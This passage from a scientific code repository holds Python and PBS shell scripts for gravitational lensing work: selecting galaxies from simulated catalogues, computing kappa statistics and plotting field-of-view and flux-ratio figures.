lephare(data,file[:-4] + \"_noIRACeazysample.cat\",False)\n    data = np.copy(lephdata)\n    lephare_noobs(data,file[:-4] + \"_eazysample_noobs.cat\",True)\n    data = np.copy(lephdata)\n    lephare_noobs(data,file[:-4] + 
\"_noIRACeazysample_noobs.cat\",False)\n" }, { "alpha_fraction": 0.7010309100151062, "alphanum_fraction": 0.8247422575950623, "avg_line_length": 96, "blob_id": "3621058ae92ddd814ebea107701cf8e9903d1cb2", "content_id": "edc1fef75c0680d34db3cd225d52b170623996e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 776, "license_type": "no_license", "max_line_length": 96, "num_lines": 8, "path": "/python/scripts/NAOJ/script_extractMillennium1.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "python extractMillennium_Henriques.py GGL_los_8_0_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_0_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.6697080135345459, "alphanum_fraction": 0.7682482004165649, "avg_line_length": 26.399999618530273, "blob_id": "ce39e1df2e157ede0adda2f2d6758f4abb92deb9", "content_id": "487fe61d1b53d295fce55389d50e606cd1f27738", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 548, "license_type": "no_license", "max_line_length": 78, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim7.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log7s.out\n#PBS -e Log7s.err\n#PBS -N 7s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr mass3\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr mass3\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr mass3\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr mass3\n" }, { "alpha_fraction": 0.6329479813575745, "alphanum_fraction": 0.7196531891822815, "avg_line_length": 19.41176414489746, "blob_id": "a63d6916c7d84487e2f58cb82aea82fd24c31aeb", "content_id": "232c72deea4600e6568ab7363917cadd4e1d38c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 346, "license_type": "no_license", "max_line_length": 125, "num_lines": 17, "path": "/python/scripts/NAOJ/batch_infersim5new.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n##PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Log5.out\n#PBS -e Log5.err\n#PBS -N 5\n#PBS -l mem=30gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython inferkappa_unbiasedwithshearJ1206withHE0435.py J1206 -1.0 -1.0 removegrouphandpicked fiducial 5 120 24 meds gal zoverr" }, { "alpha_fraction": 0.5722627639770508, "alphanum_fraction": 0.6270073056221008, "avg_line_length": 30.136363983154297, "blob_id": 
"4c0b706547b718f5ee4d6337754ef9e20a9b0fcf", "content_id": "a265c12d6233df46461bd0469f2cb8edb78b3d64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1370, "license_type": "no_license", "max_line_length": 253, "num_lines": 44, "path": "/python/plot_utilities/plot_MstarMhaloMS.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# produces density plot for the MS catalogue Mhalo vs catalogue Mstar\n\nfrom matplotlib.colors import LogNorm\nimport scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\n\nfont = 10\nticksize = 10\n\nplt.clf()\nfig = plt.figure(figsize=(10,12))\n#fig, axes = plt.subplots(nrows=2, ncols=2)\n\nax1 = fig.add_subplot(1,1,1)\n#ax1.set_aspect(1)\nfor i in range(7):\n for j in range(4):\n for k in range(4):\n x_, y_ = np.loadtxt(\"/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/GGL_los_8_0_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_ugrizJHK_WFI2033.images_forNAOJ.txt\" % (i,j,k), usecols=(4, 5), unpack=True)\n if (i==0) & (j==0) & (k==0):\n x = x_\n y = y_\n else:\n x = np.append(x,x_)\n y = np.append(y,y_)\nzlim = 15\noutlim = 0.15\nx = np.log10(x)\ny = np.log10(y)\nx = x[abs(y) <= zlim]\ny = y[abs(y) <= zlim]\ny = y[abs(x) <= zlim]\nx = x[abs(x) <= zlim]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\ncolorbar()\ndelta = (y-x)/(1+x)\nplt.xlabel('Mhalo', fontsize=font)\nplt.ylabel('Mstar', fontsize=font)\nplt.xlim(8, 16)\nplt.ylim(5, 12)\nplt.savefig('/Volumes/perseus_1/simulations/lensing_simulations/SA_galaxies/original/WFI2033/MstarMhaloMS.png' , dpi=250)\n" }, { "alpha_fraction": 0.7289628386497498, "alphanum_fraction": 0.7632094025611877, "avg_line_length": 39.880001068115234, "blob_id": "345dc1269101e730ab69e3fff61d8ee69b4972b2", "content_id": "5865170303e8536c02f15fd1084c7a71ab275d39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1022, "license_type": "no_license", "max_line_length": 109, "num_lines": 25, "path": "/python/image_utilities/align.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Subpixel cross-correlation alignment from http://image-registration.readthedocs.io/en/latest/#quick-example\n\nfrom astropy.io import fits\nfrom image_registration import chi2_shift\nfrom image_registration.fft_tools import shift\n\nimage0 = fits.open('VISTAmatch_Ks_small.fits')\ndata0 = image0[0].data\n\n# repeat this block for each image\nimage1 = fits.open('VISTAmatch_J_small.fits')\ndata1 = image1[0].data\nxoff, yoff, exoff, eyoff = chi2_shift(data0, data1,err=None,return_error=True,upsample_factor='auto')\ndata1_corr = shift.shiftnd(data1, (-yoff, -xoff))\nimage1_corr = image1\nimage1_corr[0].data = data1_corr\nimage1_corr.writeto('VISTAmatch_J_small_shift.fits',overwrite=True)\n\nimage1 = fits.open('VISTAmatch_Y_small.fits')\ndata1 = image1[0].data\nxoff, yoff, exoff, eyoff = chi2_shift(data0, data1,err=None,return_error=True,upsample_factor='auto')\ndata1_corr = shift.shiftnd(data1, (-yoff, -xoff))\nimage1_corr = image1\nimage1_corr[0].data = data1_corr\nimage1_corr.writeto('VISTAmatch_Y_small_shift.fits',overwrite=True)\n" }, { "alpha_fraction": 0.4545004963874817, "alphanum_fraction": 0.507171094417572, "avg_line_length": 51.51948165893555, "blob_id": "8aca1e13817c992231b09924d11a543b226bc238", "content_id": "e2d31e88610fba9ac7436b0196e28015495f1bf6", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4044, "license_type": "no_license", "max_line_length": 237, "num_lines": 77, "path": "/python/catalogue_utilities/SAMcutnosampling.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Selects desired fields from the SAM galaxy catalogues and implements cuts\n\nimport numpy as np\n\n#sam = \"SA\"\nsam = \"Henriques\"\nz_s = 2.375 # DES0408\nlim_i = 22.5\n\nif sam == \"SA\":\n dirin = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/original/\"\n dirout = \"/Volumes/LaCieDavis/lensing_simulations/SA_galaxies/original/SA_gal_i225_redshift2375/\"\n for i in range(8):\n for j in range(8):\n for k in range(4):\n for l in range(4):\n print i, j, k, l\n input = dirin + \"GGL_los_8_%s_%s_%s_%s_N_4096_ang_4_SA_galaxies_on_plane_27_to_63.images.txt\" %(i,j,k,l)\n output = dirout + \"SA_gal_i225_redshift2375_8_%s_%s_%s_%s_N_4096_ang_4.images.txt\" %(i,j,k,l)\n zspec = 5\n pos0 = 6\n pos1 = 7\n mag_g = 13\n mag_r = 14\n mag_i = 15\n mag_z = 16\n data = np.loadtxt(input,comments=\"GalID\",usecols=[zspec,pos0,pos1,mag_g,mag_r,mag_i,mag_z],unpack=True)\n zspec = 0\n pos0 = 1\n pos1 = 2\n mag_g = 3\n mag_r = 4\n mag_i = 5\n mag_z = 6\n dataout1 = data[zspec][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout2 = data[pos0][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout3 = data[pos1][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout4 = data[mag_g][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout5 = data[mag_r][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout6 = data[mag_i][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n dataout7 = data[mag_z][(data[zspec]<=z_s) & (data[mag_i]<=lim_i)]\n np.savetxt(output,np.c_[dataout1,dataout2,dataout3,dataout4,dataout5,dataout6,dataout7],fmt='%1.2f %1.7f %1.7f %1.2f %1.2f %1.2f %1.2f', header = 'z_spec pos_0[rad] pos_1[rad] mag_SDSS_g mag_SDSS_r mag_SDSS_i mag_SDSS_z')\n\nif sam == \"Henriques\":\n import class_Henriques2014 # this is class_Henriques2014.py\n dirin = \"/lfs08/rusucs/0408/completegalcat/\"\n dirout = \"/lfs08/rusucs/0408/completegalcat/Henriques_gal_i225_redshift2375/\"\n for i in range(8):\n for j in range(8):\n print i, j\n pl = np.linspace(27,63,63 - 27 + 1) # plane 27 redshift 3.06\n out = np.empty(5)\n for k in range(len(pl)):\n #print int(pl[k])\n with open(\"%sGGL_los_8_%d_%d_N_4096_ang_4_Henriques2014_galaxies_on_plane_%d_f.images\" % (dirin,i,j,pl[k]), mode = 'rb') as file:\n lower_bound = np.fromfile(file, 'f8', 2)\n upper_bound = np.fromfile(file, 'f8', 2)\n plane_angle, = np.fromfile(file, 'f8', 1)\n redshift, = np.fromfile(file, 'f8', 1)\n n_galaxies, = np.fromfile(file, 'i8', 1)\n n_cells = np.fromfile(file, 'i4', 2)\n gal_struct = class_Henriques2014.Henriques2014()\n galaxy = np.fromfile(file, gal_struct.galaxy_struct, n_galaxies)\n\n id = galaxy['galaxy_id']\n z = galaxy['redshift']\n pos0 = galaxy['position'][:,0]\n pos1 = galaxy['position'][:,1]\n imag = galaxy['mag'][:,gal_struct.filter_number_for_i_band_trans]\n gal = np.c_[id,z,pos0,pos1,imag].T\n ind_z = 1\n ind_imag = 4\n gal = np.delete(gal,np.where(gal[ind_z] > z_s),axis=1)\n gal = np.delete(gal,np.where(gal[ind_imag] > lim_i),axis=1)\n gal = np.delete(gal,np.where(gal[ind_imag] < 0),axis=1) # because there are some -inf in 8_7_7 and 8_3_7\n out = np.c_[out,gal]\n np.savetxt(\"%sGGL_los_8_%d_%d_N_4096_ang_4_Henriques2014_galaxies.txt\" % (dirout,i,j),out.T,fmt='%d %1.7f %1.7f %1.7f %1.2f', header = 'galaxy_id 
redshift\tpos_0\tpos_1\ti')\n" }, { "alpha_fraction": 0.5784465670585632, "alphanum_fraction": 0.6014605164527893, "avg_line_length": 32.97744369506836, "blob_id": "37275e26d6c6e36dfe7d76892dee1df163196187", "content_id": "6b963d6714008257b6cb04e9564bd878542394a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4519, "license_type": "no_license", "max_line_length": 148, "num_lines": 133, "path": "/python/plot_utilities/kappa_medsig.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Plots the equivalent of Figure 13 in Rusu et al. 2017\n\n#import matplotlib\n#matplotlib.use('Agg')\n#import matplotlib.pyplot as plt\n#import scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport os\nimport glob\n\nmin_kappa = -0.10\nmax_kappa = 1\n#min_kappa_plot = -0.05\n#max_kappa_plot = 0.2\nbin_stat = 2000\nhalfwidth = (max_kappa - min_kappa) / (bin_stat * 2.0)\n\nroot = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappa/\"\nlist = glob.glob(root+'kappahist*.cat')\n\ndef statistics(kappa_all_,bin_stat_,min_kappa_,max_kappa_):\n    a, kappa_values = np.histogram([0], bins = bin_stat_, range=(min_kappa_,max_kappa_)) # create an empty histogram of the correct shape\n\n    sum = np.sum(kappa_all_)\n    #meanX = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth)) / sum\n    #meanX2 = np.sum(kappa_counts * (kappa_values[:-1] + halfwidth) ** 2) / sum\n    #std = np.sqrt(meanX2 - meanX**2)\n\n    med = 0\n    i = 0\n    ok = False\n    while (med <= sum/2.0) and (ok == False):\n        med = med + kappa_all_[i]\n        if med > sum/2.0:\n            median = kappa_values[i] + halfwidth\n            ok = True\n        if med == sum/2.0:\n            median = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n\n    std = 0\n    ok = False\n    i = 0\n    while (std <= sum * 0.16) and (ok == False):\n        std = std + kappa_all_[i]\n        if std > sum * 0.16:\n            std1_ = kappa_values[i] + halfwidth\n            ok = True\n        if std == sum*0.16:\n            std1_ = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n\n    std = 0\n    ok = False\n    i = 0\n    while (std <= sum*0.84) and (ok == False):\n        std = std + kappa_all_[i]\n        if std > sum*0.84:\n            std1 = kappa_values[i] + halfwidth\n            ok = True\n        if std == sum*0.84:\n            std1 = kappa_values[i] + 2 * halfwidth\n            ok = True\n        i = i + 1\n\n    stddev = (std1 - std1_) / 2\n\n    return median,stddev,kappa_values\n\ndef smooth(x,window_len=11,window='hanning'):\n    \"\"\"smooth the data using a window with requested size.\n\n    This method is based on the convolution of a scaled window with the signal.\n    The signal is prepared by introducing reflected copies of the signal\n    (with the window size) in both ends so that transient parts are minimized\n    in the beginning and end part of the output signal.\n\n    input:\n        x: the input signal\n        window_len: the dimension of the smoothing window; should be an odd integer\n        window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n            flat window will produce a moving average smoothing.\n\n    output: the smoothed signal\n\n    see also:\n\n    numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n    scipy.signal.lfilter\n\n    TODO: the window parameter could be the window itself if an array instead of a string\n    NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n    \"\"\"\n\n    if x.ndim != 1:\n        raise ValueError, \"smooth only accepts 1 dimension arrays.\"\n    if not window in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n        raise ValueError, \"Window is one of 
'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\"\n if x.size < window_len:\n raise ValueError, \"Input vector needs to be bigger than window size.\"\n\n if window_len<3:\n return x\n s=np.r_[x[window_len-1:0:-1],x,x[-2:-window_len-1:-1]]\n if window == 'flat': #moving average\n w=np.ones(window_len,'d')\n else:\n w=eval('np.'+window+'(window_len)')\n y=np.convolve(w/w.sum(),s,mode='valid')\n return y\n\nfout = root + 'medstd.dat'\n#file =open('fout','a')\nos.system('rm -f %s' % fout)\n\nfor i in range(len(list)):\n file = list[i]\n kappa = np.loadtxt(file, usecols=[0], unpack=True, comments = '#')\n median,stddev,kappa_values = statistics(kappa,bin_stat,min_kappa,max_kappa)\n winlen = 12\n #smooth(kappa_3,winlen,'flat')\n #smooth(kappa_3,winlen,'hanning')\n #smooth(kappa_3,winlen,'hamming')\n #smooth(kappa_3,winlen,'bartlett')\n #smooth(kappa_3,winlen,'blackman')\n median_smooth,stddev_smooth,kappa_values_smooth = statistics(smooth(kappa,winlen,'flat')[(winlen/2-1):-(winlen/2)],bin_stat,min_kappa,max_kappa)\n str = \"%s %.3f %.3f %.3f %.3f \\n\" % (list[i],median,stddev,median_smooth,stddev_smooth)\n fileout = open(fout,'a')\n fileout.write(str)\nfileout.close()\n" }, { "alpha_fraction": 0.5911999940872192, "alphanum_fraction": 0.623199999332428, "avg_line_length": 28.761905670166016, "blob_id": "b1f1a7021162f5f75c874e58babdb56d87838072", "content_id": "c7b21efc79bee33fc2741e5ce50bca37b6f8a191", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1250, "license_type": "no_license", "max_line_length": 133, "num_lines": 42, "path": "/python/plot_utilities/fluxratio.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Simple plot with custom labels\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nplt.clf()\n\ndata = np.loadtxt('fluxratio.cat', dtype={'names': ('filter', 'A/B', 'A/C', 'A/D', 'B/C'),'formats': ('S2', 'f4', 'f4', 'f4', 'f4')})\nfilt = [x[0] for x in data]\nb = [x[1] for x in data]\nc = [x[2] for x in data]\nd = [x[3] for x in data]\nbc = [x[4] for x in data]\n\nx=np.linspace(1,len(filt),len(filt))\nplt.xticks(x, filt)\nplt.plot(x, b, label=data.dtype.names[1])\nplt.plot(x, c, label=data.dtype.names[2])\nplt.plot(x, d, label=data.dtype.names[3])\nplt.plot(x, bc, label=data.dtype.names[4])\nplt.legend()\n\nplt.savefig('fluxratio.eps', dpi=150, bbox_inches='tight')\n\nplt.clf()\n\ndata = np.loadtxt('fluxratio.cat', dtype={'names': ('filter', 'B/A', 'C/A', 'D/A', 'C/B'),'formats': ('S2', 'f4', 'f4', 'f4', 'f4')})\nfilt = [x[0] for x in data]\nb = [1/x[1] for x in data]\nc = [1/x[2] for x in data]\nd = [1/x[3] for x in data]\nbc = [1/x[4] for x in data]\n\nx=np.linspace(1,len(filt),len(filt))\nplt.xticks(x, filt)\nplt.plot(x, b, label=data.dtype.names[1])\nplt.plot(x, c, label=data.dtype.names[2])\nplt.plot(x, d, label=data.dtype.names[3])\nplt.plot(x, bc, label=data.dtype.names[4])\nplt.legend()\n\nplt.savefig('fluxratioinverse.eps', dpi=150, bbox_inches='tight')\n" }, { "alpha_fraction": 0.6097464561462402, "alphanum_fraction": 0.665213942527771, "avg_line_length": 59.095237731933594, "blob_id": "d256f49462cb6c92af521c644c754c17ed4d9d22", "content_id": "4ea97b542f9363647a0789ab2bb412caec10b134", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5048, "license_type": "no_license", "max_line_length": 186, "num_lines": 84, "path": "/python/plot_utilities/fov.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# 
creates FOV figure from Birrer et al. 2018\n\nfrom astropy.io import fits\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.clf()\npix = 1283 # number of pixels in 4 arcmin\nscale = 240.0 / pix\nmaglim1 = 24\nmaglim2 = 23\nz_l = 1.789\nx,y,i,photoz,spec,classify = np.loadtxt(\"catalogues/i24at2sigma_iunconv_igrKconv_detectin_iunconv_corrisoautoerredit_short_withbpzlephareclass.cat\",usecols=[0,1,10,30,42,49],unpack=True)\nsep = np.sqrt((x - pix/2.0)**2 + (y - pix/2.0)**2) * scale\nredshift = np.copy(photoz)\nredshift[spec >= 0] = spec[spec >= 0]\n\nspec = spec[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nphotoz = photoz[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nx = x[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\ny = y[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nclassify = classify[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nsep_ = sep[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\ni_ = i[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nredshift = redshift[(sep <= 120) & (i <= maglim1) & (redshift < z_l)]\nsep = sep_\ni = i_\n\nx_spec_bright = x[((classify == 0) | (classify == 1)) & (i <= maglim2)]\ny_spec_bright = y[((classify == 0) | (classify == 1)) & (i <= maglim2)]\nx_spec_faint = x[((classify == 0) | (classify == 1)) & (i > maglim2)]\ny_spec_faint = y[((classify == 0) | (classify == 1)) & (i > maglim2)]\nspec_bright = spec[((classify == 0) | (classify == 1)) & (i <= maglim2)]\nspec_faint = spec[((classify == 0) | (classify == 1)) & (i > maglim2)]\nredshift_spec_bright = redshift[((classify == 0) | (classify == 1)) & (i <= maglim2)]\nredshift_spec_faint = redshift[((classify == 0) | (classify == 1)) & (i > maglim2)]\n\nx_group_bright = x_spec_bright[(spec_bright > 0.736) & (spec_bright <= 0.756)]\ny_group_bright = y_spec_bright[(spec_bright > 0.736) & (spec_bright <= 0.756)]\nx_group_faint = x_spec_faint[(spec_faint > 0.736) & (spec_faint <= 0.756)]\ny_group_faint = y_spec_faint[(spec_faint > 0.736) & (spec_faint <= 0.756)]\nredshift_group_bright = redshift_spec_bright[(spec_bright > 0.736) & (spec_bright <= 0.756)]\nredshift_group_faint = redshift_spec_faint[(spec_faint > 0.736) & (spec_faint <= 0.756)]\n\nx_star_bright = x[(classify < 0) & (i <= maglim2)]\ny_star_bright = y[(classify < 0) & (i <= maglim2)]\nx_star_faint = x[(classify < 0) & (i > maglim2)]\ny_star_faint = y[(classify < 0) & (i > maglim2)]\nredshift_star_bright = redshift[(classify < 0) & (i <= maglim2)]\nredshift_star_faint = redshift[(classify < 0) & (i > maglim2)]\n\nx_galnospec_bright = x[(classify == 2) & (i <= maglim2)]\ny_galnospec_bright = y[(classify == 2) & (i <= maglim2)]\nx_galnospec_faint = x[(classify == 2) & (i > maglim2)]\ny_galnospec_faint = y[(classify == 2) & (i > maglim2)]\nredshift_galnospec_bright = redshift[(classify == 2) & (i <= maglim2)]\nredshift_galnospec_faint = redshift[(classify == 2) & (i > maglim2)]\n\nimage = fits.getdata(\"images/J1206_GMOSi_CFHTLSscale_weighted_bkg96_masked.fits\")\nimage[image<0] = 0.0001\nzmax = 0.1*round(10*np.max(redshift)) + 0.1\n\nmask = fits.getdata(\"catalogues/mskforplot.fits\")\n\nplt.scatter(x_star_bright,y_star_bright,marker='*',edgecolors='none',s=30,linewidths=1,c=redshift_star_bright,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_star_faint,y_star_faint,marker='*',edgecolors='none',s=10,linewidths=1,c=redshift_star_faint,cmap = 
plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_galnospec_bright,y_galnospec_bright,marker='o',edgecolors='none',s=30,linewidths=1,c=redshift_galnospec_bright,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_galnospec_faint,y_galnospec_faint,marker='o',edgecolors='none',s=10,linewidths=1,c=redshift_galnospec_faint,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_spec_bright,y_spec_bright,marker='s',edgecolors='none',linewidths=1,s=30,c=redshift_spec_bright,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_spec_faint,y_spec_faint,marker='s',edgecolors='none',linewidths=1,s=10,c=redshift_spec_faint,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_group_bright,y_group_bright,marker='s',edgecolors='k',linewidths=1,s=30,c=redshift_group_bright,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.scatter(x_group_faint,y_group_faint,marker='s',edgecolors='k',linewidths=1,s=10,c=redshift_group_faint,cmap = plt.cm.get_cmap(\"CMRmap\"),alpha=0.5,vmin=0,vmax=zmax)\nplt.colorbar(format='%.1f')#,boundaries=[0,1.8])\nplt.imshow(image, cmap='gray_r', norm=LogNorm(), origin='lower', vmin=0.001, vmax=100)\nplt.imshow(mask, cmap='Oranges', origin='lower', alpha=0.2)\ncircle1 = plt.Circle((pix/2.0,pix/2.0),45/120.0*pix/2.0,color='k',fill=False)\ncircle2 = plt.Circle((pix/2.0,pix/2.0),pix/2.0,color='k',fill=False)\nfig = plt.gcf()\nfig.gca().add_artist(circle1)\nfig.gca().add_artist(circle2)\nfig = plt.gca()\nfig.axes.get_xaxis().set_visible(False)\nfig.axes.get_yaxis().set_visible(False)\nplt.savefig('FOV_J1206.png', dpi=300, bbox_inches='tight')\n" }, { "alpha_fraction": 0.5873417854309082, "alphanum_fraction": 0.7426160573959351, "avg_line_length": 48.375, "blob_id": "87c6d1904c37ebbfc2a3326df7cda047694b7b6d", "content_id": "4e330477fc4e9e6c07be57bab346ff87f833cfa5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1185, "license_type": "no_license", "max_line_length": 119, "num_lines": 24, "path": "/python/scripts/NAOJ/batch0_insertstars_.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb0_.out\n#PBS -e Logb0_.err\n#PBS -N 0_\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_1_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_2_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_3_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_4_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_5_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_6_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\npython kappamed_insertstarsnobetanomass.py J1206 GGL_los_8_0_7_N_4096_ang_4_rays_to_plane_34_f 22.5 45 measured 5 -1 -1\n" }, { "alpha_fraction": 0.5497599244117737, "alphanum_fraction": 0.6145787835121155, 
"avg_line_length": 52.27906799316406, "blob_id": "a569de3f0ca079163fa6b99d6faec73c939f36d6", "content_id": "56f9427f62ef1deeaebabae2b30d06935d63b26f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4582, "license_type": "no_license", "max_line_length": 377, "num_lines": 86, "path": "/python/catalogue_utilities/plotkappabarall_WFI2033 copy.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the output statistics produced by plotkappacompletestatistics.py/plotkappabiascompletestatistics.py in order to plot bars. Run without arguments. Make sure the uncomment the appropriate ax.set_ylim, ylabel and savefig lines\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n\nroot = \"/Users/eduardrusu/Dropbox/Davis_work/code/GOODCODE/WFI2033kappa/\"\n\n#kappastat_45 = np.loadtxt(\"%skappastatistics_WFI2033_5_23_45.lst\" % root, unpack=True)\n#kappastat_120 = np.loadtxt(\"%skappastatistics_WFI2033_5_23_120.lst\" % root, unpack=True)\nkappastat_45 = np.loadtxt(\"%skappacomputebias_WFI2033_5_23_45.lst\" % root, unpack=True)\nkappastat_120 = np.loadtxt(\"%skappacomputebias_WFI2033_5_23_120.lst\" % root, unpack=True)\n\nN = 18\nind = 2.5 * np.arange(N) # the x locations for the groups\nwidth = 0.8 # the width of the bars\n\nax = plt.subplot(2,1,1)\n\ncol1 = (kappastat_45[0])\nrects1 = ax.bar(ind + width, col1, width, color='r')\ncol2 = (kappastat_120[0])\nrects2 = ax.bar(ind + 2*width, col2, width, color='b')\n\n#ax.set_ylim([0.00,0.05])\nax.set_ylim([-0.1,0.1])\n#ax.set_ylabel('median$_\\kappa$')\nax.set_ylabel('$\\mathrm{median}_{\\kappa_\\mathrm{med} - \\kappa_\\mathrm{true}}$')\nax.set_xticks(ind + 2*width)\nax.set_xticklabels(('$1-1/r$', '$z$', '$M_\\star$', '$M^2_\\star$', '$M^3_\\star$', '$1/r$', '$z/r$', '$M_\\star/r$', '$M^2_\\star/r$', '$M^3_\\star/r$', '$M^2_{\\star\\mathrm{rms}}$', '$M^3_{\\star\\mathrm{rms}}$', '$M^2_\\star/r_\\mathrm{,rms}$', 